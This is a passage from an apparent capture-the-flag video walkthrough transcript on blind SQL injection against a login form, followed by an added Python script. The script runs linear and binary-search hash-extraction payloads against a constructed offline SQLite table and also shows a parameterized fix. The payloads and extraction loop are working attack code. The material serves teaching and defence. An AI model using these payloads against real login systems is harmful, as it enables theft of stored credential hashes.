we're just going to make this a list by default no comma here okay let's see if this works finding it like this I could have swore you did I'm actually not exactly sure what's going on this is a little weird negative one does that chop off last nope is it like ends with let's see Python three don't print newline I don't print without new line or space I wonder if my this print oh this prints in the wrong spot I'm an idiot here we go 0e 4 you can see us going a little bit faster with that break and that gets the administrators hash we can copy this and just do echo - n paste this WCC 31 so we have to create this loop to be 33 and now we'll get that last character to make it 32 characters which is an md5 hash so this is how the SQL injection is working and if you wanted to I'm not gonna actually code this but I'll show you a small trick to make this a little bit faster and it's up to you if you want to do the coding we could also see the easiest way to explain this we'll just do it so if we do would to convert this into an ordinal number and the very first one let's see is going to be 1 which is 0 this isn't going to work 7300 76 because free man ASCII table man ASCII we can pull up an ASCII table and if we go down to 0 the ordinal numbers I believe our decimal and go all the way down to 0 we can see that should be 48 so if we equals 48 here we get 7200 93 which is the correct thing so if you want to speed this up you could say ok well if this number is where is the last number greater than 58 so if we do greater than 58 we know it's going to be a character and if it's less than 58 we know it's going to be a number and then we don't have to loop over the characters because we know we just eliminated nine things at once essentially so we put that here if it's less than we start the loop here if it's more we start to loop here and you can also go even further and then say if it's less than whatever ORD for is go back more than go forward and do those less than or 
greater than to take out a bunch of characters at once and that will speed this up greatly so instead of making like 15 requests you make two requests to find it or something like that and I think that's gonna sum up the video so yeah hope you guys enjoyed this take care and I'll see you next week
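The script the video builds at the end, together with the ord()-style speed-up it describes but does not code, as an added example that is not IppSec's sqlinject.py and not anything from the Falafel box. To keep it runnable offline it swaps the requests.post() call for an oracle over a constructed in-memory SQLite users table with a made-up hash (FAKE_ADMIN_HASH, login_vulnerable, oracle_for and the other names are this example's own), so the "Wrong identification" check becomes a boolean from a real query built by string concatenation, exactly the shape the video reasons about. The comparison trick is written as a string comparison rather than MySQL's ord() so it runs on SQLite too, and login_safe shows the bound-parameter form of the same query, against which the payload is just an odd-looking username:

```python
"""Boolean-based blind SQL injection: the character-at-a-time loop from the video,
run against a constructed in-memory SQLite login so it executes offline."""
import hashlib
import sqlite3
from typing import Callable, Tuple

HEX = "0123456789abcdef"   # an md5 hex digest only ever contains these, in this (ASCII) order
HASH_LEN = 32

# Constructed stand-in for the users table: the hash is made up for this example,
# not a value from Falafel.  It starts with "0e" like the one the video pulls out.
FAKE_ADMIN_HASH = "0e" + hashlib.md5(b"constructed-example").hexdigest()[2:]


def build_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', ?)", (FAKE_ADMIN_HASH,))
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Query built the way the video reasons about it: user input spliced into the SQL."""
    query = "SELECT 1 FROM users WHERE username='%s' AND password='%s'" % (username, password)
    try:
        return db.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False   # a broken query shows the same failure page as a wrong password


def login_safe(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Same query with bound parameters: the payload below is only ever a literal username."""
    query = "SELECT 1 FROM users WHERE username=? AND password=?"
    return db.execute(query, (username, password)).fetchone() is not None


def oracle_for(db: sqlite3.Connection) -> Callable[[str], bool]:
    """Stand-in for 'did login.php answer Wrong identification?' (the 7393-byte page)."""
    return lambda injection: login_vulnerable(db, injection, "please subscribe")


def get_sql(i: int, c: str) -> str:
    # The video's payload: is character i of the admin hash equal to c?
    return "admin' and substr(password,%d,1)='%s'-- -" % (i, c)


def get_sql_ge(i: int, c: str) -> str:
    # The video's ord() comparison trick, as a string comparison so it also runs on SQLite
    return "admin' and substr(password,%d,1)>='%s'-- -" % (i, c)


def extract_linear(oracle: Callable[[str], bool], length: int = HASH_LEN) -> Tuple[str, int]:
    """Try every hex char per position, break on the first hit; returns (hash, requests made)."""
    found, n_requests = "", 0
    for i in range(1, length + 1):          # substr() positions are 1-based
        for c in HEX:
            n_requests += 1
            if oracle(get_sql(i, c)):
                found += c
                break
        else:
            raise RuntimeError("no hex character matched position %d" % i)
    return found, n_requests


def extract_bisect(oracle: Callable[[str], bool], length: int = HASH_LEN) -> Tuple[str, int]:
    """Binary search over the sorted alphabet: exactly 4 requests per character, not up to 16."""
    found, n_requests = "", 0
    for i in range(1, length + 1):
        lo, hi = 0, len(HEX) - 1             # candidate index range into HEX
        while lo < hi:
            mid = (lo + hi + 1) // 2
            n_requests += 1
            if oracle(get_sql_ge(i, HEX[mid])):
                lo = mid                     # character is at or above HEX[mid]
            else:
                hi = mid - 1                 # character is below HEX[mid]
        found += HEX[lo]
    return found, n_requests


if __name__ == "__main__":
    db = build_db()
    oracle = oracle_for(db)
    for name, fn in (("linear", extract_linear), ("bisect", extract_bisect)):
        digest, n = fn(oracle)
        print("%-6s %s in %d requests" % (name, digest, n))
    # The bound-parameter login does not react to the payload at all:
    print("safe login with payload:", login_safe(db, get_sql(1, FAKE_ADMIN_HASH[0]), "x"))
```

Swapping the oracle for a function that POSTs the username field and tests for the success string is the only change between this and an HTTP version, which is also what makes the attack easy to spot in a web log: 32 positions times 16 (or 4) near-identical POSTs to the same endpoint, differing only in a substr() clause inside the username. The login_safe variant is the fix the video's reasoning implies, since with placeholders the quote and comment never reach the SQL parser.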